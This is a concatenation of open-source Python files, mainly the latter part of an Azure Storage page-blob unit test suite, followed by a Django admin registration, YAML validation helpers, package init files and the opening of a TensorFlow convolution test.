end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_none_match=src_blob_resource_properties.etag)
@record
def test_update_page_from_url_with_if_modified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
if_modified_since=resource_properties.last_modified - timedelta(
minutes=15))
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
# make sure sufficient time has passed
if not self.is_playback():
self.sleep(2)
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_modified_since=resource_properties.last_modified)
@record
def test_update_page_from_url_with_if_unmodified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, if_unmodified_since=resource_properties.last_modified)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
if_unmodified_since=resource_properties.last_modified - timedelta(
minutes=15))

    @record
    def test_update_page_from_url_with_if_match(self):
        # Arrange
        dest_blob_name = self.get_resource_name('destblob')
        resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)

        # Act part 1: make update page from url calls
        resp = self.bs.update_page_from_url(
            self.container_name, dest_blob_name, start_range=0,
            end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
            source_range_start=0, if_match=resource_properties.etag)
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)

        # Assert the destination blob is constructed correctly
        blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
        self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
        self.assertEqual(blob.properties.etag, resp.etag)
        self.assertEqual(blob.properties.last_modified, resp.last_modified)

        # Act part 2: update page from url with failing condition
        with self.assertRaises(AzureHttpError):
            self.bs.update_page_from_url(
                self.container_name, dest_blob_name, start_range=0,
                end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
                source_range_start=0, if_match='0x111111111111111')

    @record
    def test_update_page_from_url_with_if_none_match(self):
        # Arrange
        dest_blob_name = self.get_resource_name('destblob')
        self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)

        # Act part 1: make update page from url calls
        resp = self.bs.update_page_from_url(
            self.container_name, dest_blob_name, start_range=0,
            end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
            source_range_start=0, if_none_match='0x111111111111111')
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)

        # Assert the destination blob is constructed correctly
        blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
        self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
        self.assertEqual(blob.properties.etag, resp.etag)
        self.assertEqual(blob.properties.last_modified, resp.last_modified)

        # Act part 2: update page from url with failing condition
        with self.assertRaises(AzureHttpError):
            self.bs.update_page_from_url(
                self.container_name, dest_blob_name, start_range=0,
                end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
                source_range_start=0, if_none_match=blob.properties.etag)

    @record
    def test_update_page_from_url_with_sequence_number_lt(self):
        # Arrange
        start_sequence = 10
        dest_blob_name = self.get_resource_name('destblob')
        self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE, sequence_number=start_sequence)

        # Act part 1: make update page from url calls
        resp = self.bs.update_page_from_url(
            self.container_name, dest_blob_name, start_range=0,
            end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
            source_range_start=0, if_sequence_number_lt=start_sequence + 1)
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)

        # Assert the destination blob is constructed correctly
        blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
        self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
        self.assertEqual(blob.properties.etag, resp.etag)
        self.assertEqual(blob.properties.last_modified, resp.last_modified)

        # Act part 2: update page from url with failing condition
        with self.assertRaises(AzureHttpError):
            self.bs.update_page_from_url(
                self.container_name, dest_blob_name, start_range=0,
                end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
                source_range_start=0, if_sequence_number_lt=start_sequence)

    @record
    def test_update_page_from_url_with_sequence_number_lte(self):
        # Arrange
        start_sequence = 10
        dest_blob_name = self.get_resource_name('destblob')
        self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE, sequence_number=start_sequence)

        # Act part 1: make update page from url calls
        resp = self.bs.update_page_from_url(
            self.container_name, dest_blob_name, start_range=0,
            end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
            source_range_start=0, if_sequence_number_lte=start_sequence)
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)

        # Assert the destination blob is constructed correctly
        blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
        self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
        self.assertEqual(blob.properties.etag, resp.etag)
        self.assertEqual(blob.properties.last_modified, resp.last_modified)

        # Act part 2: update page from url with failing condition
        with self.assertRaises(AzureHttpError):
            self.bs.update_page_from_url(
                self.container_name, dest_blob_name, start_range=0,
                end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
                source_range_start=0, if_sequence_number_lte=start_sequence - 1)

    @record
    def test_update_page_from_url_with_sequence_number_eq(self):
        # Arrange
        start_sequence = 10
        dest_blob_name = self.get_resource_name('destblob')
        self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE, sequence_number=start_sequence)

        # Act part 1: make update page from url calls
        resp = self.bs.update_page_from_url(
            self.container_name, dest_blob_name, start_range=0,
            end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
            source_range_start=0, if_sequence_number_eq=start_sequence)
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)

        # Assert the destination blob is constructed correctly
        blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
        self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
        self.assertEqual(blob.properties.etag, resp.etag)
        self.assertEqual(blob.properties.last_modified, resp.last_modified)

        # Act part 2: update page from url with failing condition
        with self.assertRaises(AzureHttpError):
            self.bs.update_page_from_url(
                self.container_name, dest_blob_name, start_range=0,
                end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
                source_range_start=0, if_sequence_number_eq=start_sequence + 1)

    @record
    def test_get_page_ranges_no_pages(self):
        # Arrange
        blob_name = self._create_blob()

        # Act
        ranges = self.bs.get_page_ranges(self.container_name, blob_name)

        # Assert
        self.assertIsNotNone(ranges)
        self.assertIsInstance(ranges, list)
        self.assertEqual(len(ranges), 0)

    @record
    def test_get_page_ranges_2_pages(self):
        # Arrange
        blob_name = self._create_blob(2048)
        data = self.get_random_bytes(512)
        resp1 = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
        resp2 = self.bs.update_page(self.container_name, blob_name, data, 1024, 1535)

        # Act
        ranges = self.bs.get_page_ranges(self.container_name, blob_name)

        # Assert
        self.assertIsNotNone(ranges)
        self.assertIsInstance(ranges, list)
        self.assertEqual(len(ranges), 2)
        self.assertEqual(ranges[0].start, 0)
        self.assertEqual(ranges[0].end, 511)
        self.assertEqual(ranges[1].start, 1024)
        self.assertEqual(ranges[1].end, 1535)

    @record
    def test_get_page_ranges_diff(self):
        # Arrange
        blob_name = self._create_blob(2048)
        data = self.get_random_bytes(1536)
        snapshot1 = self.bs.snapshot_blob(self.container_name, blob_name)
        self.bs.update_page(self.container_name, blob_name, data, 0, 1535)
        snapshot2 = self.bs.snapshot_blob(self.container_name, blob_name)
        self.bs.clear_page(self.container_name, blob_name, 512, 1023)

        # Act
        ranges1 = self.bs.get_page_ranges_diff(self.container_name, blob_name, snapshot1.snapshot)
        ranges2 = self.bs.get_page_ranges_diff(self.container_name, blob_name, snapshot2.snapshot)

        # Assert
        self.assertIsNotNone(ranges1)
        self.assertIsInstance(ranges1, list)
        self.assertEqual(len(ranges1), 3)
        self.assertEqual(ranges1[0].is_cleared, False)
        self.assertEqual(ranges1[0].start, 0)
        self.assertEqual(ranges1[0].end, 511)
        self.assertEqual(ranges1[1].is_cleared, True)
        self.assertEqual(ranges1[1].start, 512)
        self.assertEqual(ranges1[1].end, 1023)
        self.assertEqual(ranges1[2].is_cleared, False)
        self.assertEqual(ranges1[2].start, 1024)
        self.assertEqual(ranges1[2].end, 1535)

        self.assertIsNotNone(ranges2)
        self.assertIsInstance(ranges2, list)
        self.assertEqual(len(ranges2), 1)
        self.assertEqual(ranges2[0].is_cleared, True)
        self.assertEqual(ranges2[0].start, 512)
        self.assertEqual(ranges2[0].end, 1023)

    @record
    def test_update_page_fail(self):
        # Arrange
        blob_name = self._create_blob(2048)
        data = self.get_random_bytes(512)
        resp1 = self.bs.update_page(self.container_name, blob_name, data, 0, 511)

        # Act
        try:
            self.bs.update_page(self.container_name, blob_name, data, 1024, 1536)
        except ValueError as e:
            self.assertEqual(str(e), 'end_range must align with 512 page size')
            return

        # Assert
        raise Exception('Page range validation failed to throw on failure case')

    @record
    def test_resize_blob(self):
        # Arrange
        blob_name = self._create_blob(1024)

        # Act
        resp = self.bs.resize_blob(self.container_name, blob_name, 512)

        # Assert
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)
        self.assertIsNotNone(resp.sequence_number)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)
        self.assertIsInstance(blob, Blob)
        self.assertEqual(blob.properties.content_length, 512)

    @record
    def test_set_sequence_number_blob(self):
        # Arrange
        blob_name = self._create_blob()

        # Act
        resp = self.bs.set_sequence_number(self.container_name, blob_name, SequenceNumberAction.Update, 6)

        # Assert
        self.assertIsNotNone(resp.etag)
        self.assertIsNotNone(resp.last_modified)
        self.assertIsNotNone(resp.sequence_number)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)
        self.assertIsInstance(blob, Blob)
        self.assertEqual(blob.properties.page_blob_sequence_number, 6)

    def test_create_blob_from_bytes(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)

        # Act
        create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_0_bytes(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(0)

        # Act
        create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_bytes_with_progress(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)

        # Act
        progress = []

        def callback(current, total):
            progress.append((current, total))

        create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data,
                                                     progress_callback=callback)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_bytes_with_index(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        index = 1024

        # Act
        self.bs.create_blob_from_bytes(self.container_name, blob_name, data, index)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[1024:])

    @record
    def test_create_blob_from_bytes_with_index_and_count(self):
        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        index = 512
        count = 1024

        # Act
        create_resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data, index, count)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[index:index + count])
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_path(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        FILE_PATH = 'blob_input.temp.dat'
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        create_resp = self.bs.create_blob_from_path(self.container_name, blob_name, FILE_PATH)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_path_with_progress(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []

        def callback(current, total):
            progress.append((current, total))

        self.bs.create_blob_from_path(self.container_name, blob_name, FILE_PATH,
                                      progress_callback=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assert_upload_progress(len(data), self.bs.MAX_PAGE_SIZE, progress)

    def test_create_blob_from_stream(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        blob_size = len(data)
        with open(FILE_PATH, 'rb') as stream:
            create_resp = self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_stream_with_empty_pages(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        # data is almost all empty (0s) except two ranges
        blob_name = self._get_blob_reference()
        data = bytearray(LARGE_BLOB_SIZE)
        data[512: 1024] = self.get_random_bytes(512)
        data[8192: 8196] = self.get_random_bytes(4)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        blob_size = len(data)
        with open(FILE_PATH, 'rb') as stream:
            create_resp = self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
        blob = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        # the uploader should have skipped the empty ranges
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        page_ranges = list(self.bs.get_page_ranges(self.container_name, blob_name))
        self.assertEqual(len(page_ranges), 2)
        self.assertEqual(page_ranges[0].start, 0)
        self.assertEqual(page_ranges[0].end, 4095)
        self.assertEqual(page_ranges[1].start, 8192)
        self.assertEqual(page_ranges[1].end, 12287)
        self.assertEqual(blob.properties.etag, create_resp.etag)
        self.assertEqual(blob.properties.last_modified, create_resp.last_modified)

    def test_create_blob_from_stream_non_seekable(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        blob_size = len(data)
        with open(FILE_PATH, 'rb') as stream:
            non_seekable_file = StoragePageBlobTest.NonSeekableFile(stream)
            self.bs.create_blob_from_stream(self.container_name, blob_name, non_seekable_file, blob_size,
                                            max_connections=1)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])

    def test_create_blob_from_stream_with_progress(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []

        def callback(current, total):
            progress.append((current, total))

        blob_size = len(data)
        with open(FILE_PATH, 'rb') as stream:
            self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size,
                                            progress_callback=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        self.assert_upload_progress(len(data), self.bs.MAX_PAGE_SIZE, progress)

    def test_create_blob_from_stream_truncated(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        blob_size = len(data) - 512
        with open(FILE_PATH, 'rb') as stream:
            self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])

    def test_create_blob_from_stream_with_progress_truncated(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []

        def callback(current, total):
            progress.append((current, total))

        blob_size = len(data) - 512
        with open(FILE_PATH, 'rb') as stream:
            self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size,
                                            progress_callback=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        self.assert_upload_progress(blob_size, self.bs.MAX_PAGE_SIZE, progress)

    @record
    def test_create_blob_with_md5_small(self):
        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(512)

        # Act
        self.bs.create_blob_from_bytes(self.container_name, blob_name, data, validate_content=True)

        # Assert

    def test_create_blob_with_md5_large(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        blob_name = self._get_blob_reference()
        data = self.get_random_bytes(LARGE_BLOB_SIZE)

        # Act
        self.bs.create_blob_from_bytes(self.container_name, blob_name, data, validate_content=True)

        # Assert

    def test_incremental_copy_blob(self):
        # parallel tests introduce random order of requests, can only run live
        if TestMode.need_recording_file(self.test_mode):
            return

        # Arrange
        source_blob_name = self._create_blob(2048)
        data = self.get_random_bytes(512)
        resp1 = self.bs.update_page(self.container_name, source_blob_name, data, 0, 511)
        resp2 = self.bs.update_page(self.container_name, source_blob_name, data, 1024, 1535)
        source_snapshot_blob = self.bs.snapshot_blob(self.container_name, source_blob_name)

        sas_token = self.bs.generate_blob_shared_access_signature(
            self.container_name,
            source_blob_name,
            permission=BlobPermissions.READ,
            expiry=datetime.utcnow() + timedelta(hours=1),
        )

        # Act
        source_blob_url = self.bs.make_blob_url(
            self.container_name,
            source_blob_name,  # + '?snapshot=' + source_snapshot_blob.snapshot,
            sas_token=sas_token,
            snapshot=source_snapshot_blob.snapshot)

        dest_blob_name = 'dest_blob'
        copy = self.bs.incremental_copy_blob(self.container_name, dest_blob_name, source_blob_url)

        # Assert
        self.assertEqual(copy.status, 'pending')
        self._wait_for_async_copy(self.container_name, dest_blob_name)
        self.assertIsNotNone(copy)
        self.assertIsNotNone(copy.id)

        copy_blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
        self.assertEqual(copy_blob.properties.copy.status, 'success')
        self.assertIsNotNone(copy_blob.properties.copy.destination_snapshot_time)

        # strip off protocol
        self.assertTrue(copy_blob.properties.copy.source.endswith(source_blob_url[5:]))

    @record
    def test_blob_tier_on_create(self):
        ps = self._create_premium_storage_service(PageBlobService, self.settings)
        try:
            container_name = self.get_resource_name('utpremiumcontainer')
            if not self.is_playback():
                ps.create_container(container_name)

            # test create_blob API
            blob_name = self._get_blob_reference()
            ps.create_blob(container_name, blob_name, 1024, premium_page_blob_tier=PremiumPageBlobTier.P4)
            blob = ps.get_blob_properties(container_name, blob_name)
            self.assertEqual(blob.properties.blob_tier, PremiumPageBlobTier.P4)
            self.assertFalse(blob.properties.blob_tier_inferred)

            # test create_blob_from_bytes API
            blob_name2 = self._get_blob_reference()
            byte_data = self.get_random_bytes(1024)
            ps.create_blob_from_bytes(container_name, blob_name2, byte_data,
                                      premium_page_blob_tier=PremiumPageBlobTier.P6)
            blob2 = ps.get_blob_properties(container_name, blob_name2)
            self.assertEqual(blob2.properties.blob_tier, PremiumPageBlobTier.P6)
            self.assertFalse(blob2.properties.blob_tier_inferred)

            # test create_blob_from_path API
            blob_name3 = self._get_blob_reference()
            with open(FILE_PATH, 'wb') as stream:
                stream.write(byte_data)
            ps.create_blob_from_path(container_name, blob_name3, FILE_PATH,
                                     premium_page_blob_tier=PremiumPageBlobTier.P10)
            blob3 = ps.get_blob_properties(container_name, blob_name3)
            self.assertEqual(blob3.properties.blob_tier, PremiumPageBlobTier.P10)
            self.assertFalse(blob3.properties.blob_tier_inferred)

            # test create_blob_from_stream API
            blob_name4 = self._get_blob_reference()
            with open(FILE_PATH, 'rb') as stream:
                ps.create_blob_from_stream(container_name, blob_name4, stream, 1024,
                                           premium_page_blob_tier=PremiumPageBlobTier.P20)
            blob4 = ps.get_blob_properties(container_name, blob_name4)
            self.assertEqual(blob4.properties.blob_tier, PremiumPageBlobTier.P20)
            self.assertFalse(blob4.properties.blob_tier_inferred)
        finally:
            ps.delete_container(container_name)

    @record
    def test_blob_tier_set_tier_api(self):
        ps = self._create_premium_storage_service(PageBlobService, self.settings)
        try:
            container_name = self.get_resource_name('utpremiumcontainer')
            if not self.is_playback():
                ps.create_container(container_name)

            blob_name = self._get_blob_reference()
            ps.create_blob(container_name, blob_name, 1024)
            blob_ref = ps.get_blob_properties(container_name, blob_name)
            self.assertEqual(PremiumPageBlobTier.P10, blob_ref.properties.blob_tier)
            self.assertIsNotNone(blob_ref.properties.blob_tier)
            self.assertTrue(blob_ref.properties.blob_tier_inferred)

            blobs = list(ps.list_blobs(container_name))

            # Assert
            self.assertIsNotNone(blobs)
            self.assertGreaterEqual(len(blobs), 1)
            self.assertIsNotNone(blobs[0])
            self.assertNamedItemInContainer(blobs, blob_name)

            ps.set_premium_page_blob_tier(container_name, blob_name, PremiumPageBlobTier.P50)

            blob_ref2 = ps.get_blob_properties(container_name, blob_name)
            self.assertEqual(PremiumPageBlobTier.P50, blob_ref2.properties.blob_tier)
            self.assertFalse(blob_ref2.properties.blob_tier_inferred)

            blobs = list(ps.list_blobs(container_name))

            # Assert
            self.assertIsNotNone(blobs)
            self.assertGreaterEqual(len(blobs), 1)
            self.assertIsNotNone(blobs[0])
            self.assertNamedItemInContainer(blobs, blob_name)
            self.assertEqual(blobs[0].properties.blob_tier, PremiumPageBlobTier.P50)
            self.assertFalse(blobs[0].properties.blob_tier_inferred)
        finally:
            ps.delete_container(container_name)

    @record
    def test_blob_tier_copy_blob(self):
        ps = self._create_premium_storage_service(PageBlobService, self.settings)
        try:
            container_name = self.get_resource_name('utpremiumcontainer')
            if not self.is_playback():
                ps.create_container(container_name)

            # Arrange
            source_blob_name = self._get_blob_reference()
            ps.create_blob(container_name, source_blob_name, 1024, premium_page_blob_tier=PremiumPageBlobTier.P10)

            # Act
            source_blob = '/{0}/{1}/{2}'.format(self.settings.PREMIUM_STORAGE_ACCOUNT_NAME,
                                                container_name,
                                                source_blob_name)
            copy = ps.copy_blob(container_name, 'blob1copy', source_blob,
                                premium_page_blob_tier=PremiumPageBlobTier.P30)

            # Assert
            self.assertIsNotNone(copy)
            self.assertEqual(copy.status, 'success')
            self.assertIsNotNone(copy.id)

            copy_ref = ps.get_blob_properties(container_name, 'blob1copy')
            self.assertEqual(copy_ref.properties.blob_tier, PremiumPageBlobTier.P30)

            source_blob_name2 = self._get_blob_reference()
            ps.create_blob(container_name, source_blob_name2, 1024)
            source_blob2 = '/{0}/{1}/{2}'.format(self.settings.STORAGE_ACCOUNT_NAME,
                                                 container_name,
                                                 source_blob_name2)

            copy2 = ps.copy_blob(container_name, 'blob2copy', source_blob2,
                                 premium_page_blob_tier=PremiumPageBlobTier.P60)
            self.assertIsNotNone(copy2)
            self.assertEqual(copy2.status, 'success')
            self.assertIsNotNone(copy2.id)

            copy_ref2 = ps.get_blob_properties(container_name, 'blob2copy')
            self.assertEqual(copy_ref2.properties.blob_tier, PremiumPageBlobTier.P60)
            self.assertFalse(copy_ref2.properties.blob_tier_inferred)

            copy3 = ps.copy_blob(container_name, 'blob3copy', source_blob2)
            self.assertIsNotNone(copy3)
            self.assertEqual(copy3.status, 'success')
            self.assertIsNotNone(copy3.id)

            copy_ref3 = ps.get_blob_properties(container_name, 'blob3copy')
            self.assertEqual(copy_ref3.properties.blob_tier, PremiumPageBlobTier.P10)
            self.assertTrue(copy_ref3.properties.blob_tier_inferred)
        finally:
            ps.delete_container(container_name)
# ------------------------------------------------------------------------------
if __name__ == '__main__':
    unittest.main()

# ------------------------------------------------------------------------------
# backend/portal/admin.py (pennlabs/student-life, MIT)

from django.contrib import admin
from portal.models import Poll, PollOption, PollVote, TargetPopulation

admin.site.register(TargetPopulation)
admin.site.register(Poll)
admin.site.register(PollOption)
admin.site.register(PollVote)

# ------------------------------------------------------------------------------
# mazikeen/GeneratorUtils.py (hanniballar/mazikeen, MIT)

from mazikeen.GeneratorException import GeneratorException

def getYamlInt(data, line, field):
    if data is None:
        return None
    if not isinstance(data, int):
        if isinstance(data, dict):
            raise GeneratorException(f"field '{field}' expects an integer at line {data['__line__']}")
        raise GeneratorException(f"field '{field}' expects an integer at line {line}")
    return data


def getYamlBool(data, line, field):
    if not isinstance(data, bool):
        if isinstance(data, dict):
            raise GeneratorException(f"field '{field}' expects a bool at line {data['__line__']}")
        raise GeneratorException(f"field '{field}' expects a bool at line {line}")
    return data


def getYamlString(data, line, field):
    if not isinstance(data, str):
        if isinstance(data, dict):
            raise GeneratorException(f"field '{field}' expects a string at line {data['__line__']}")
        raise GeneratorException(f"field '{field}' expects a string at line {line}")
    return data


def getYamlList(data, line, field):
    if not isinstance(data, list):
        if isinstance(data, dict):
            raise GeneratorException(f"field '{field}' expects a list at line {data['__line__']}")
        raise GeneratorException(f"field '{field}' expects a list at line {line}")
    return data
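
# Example usage (illustrative only, not part of the original module): each helper
# returns the value unchanged when its type matches and raises GeneratorException
# otherwise, e.g.
#
#     getYamlInt(3, line=7, field="retries")          # -> 3
#     getYamlInt("3", line=7, field="retries")        # raises GeneratorException
#     getYamlList(["a", "b"], line=9, field="steps")  # -> ["a", "b"]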

# ------------------------------------------------------------------------------
# hurricane/testing/__init__.py (marty-2015/django-hurricane, MIT)

from .testcases import *

# ------------------------------------------------------------------------------
# preprocessing/spelchek/__init__.py (fnatanoy/toxic_comments_classification, MIT)

from . import spelchek

# ------------------------------------------------------------------------------
# tests/ops/test_convolution.py (897615138/tfsnippet-jill, MIT)

import numpy as np
import tensorflow as tf
from mock import mock

from tests.layers.convolutional.helper import (input_maybe_to_channels_last,
                                               output_maybe_to_channels_first)
from tfsnippet.ops import space_to_depth, depth_to_space

tf_space_to_depth = tf.space_to_depth
tf_depth_to_space = tf.depth_to_space


def patched_space_to_depth(input, block_size, data_format):
    input = input_maybe_to_channels_last(input, data_format=data_format)
    output = tf_space_to_depth(
        input=input, block_size=block_size, data_format='NHWC')
    output = output_maybe_to_channels_first(output, data_format=data_format)
    return output


def naive_space_to_depth(x, bs, channels_last):
    if channels_last:
        h, w, c = x.shape[-3:]
        h2, w2, c2 = h // bs, w // bs, c * bs * bs
        y = np.reshape(x, x.shape[:-3] + (h2, bs) + (w2, bs) + (c,))
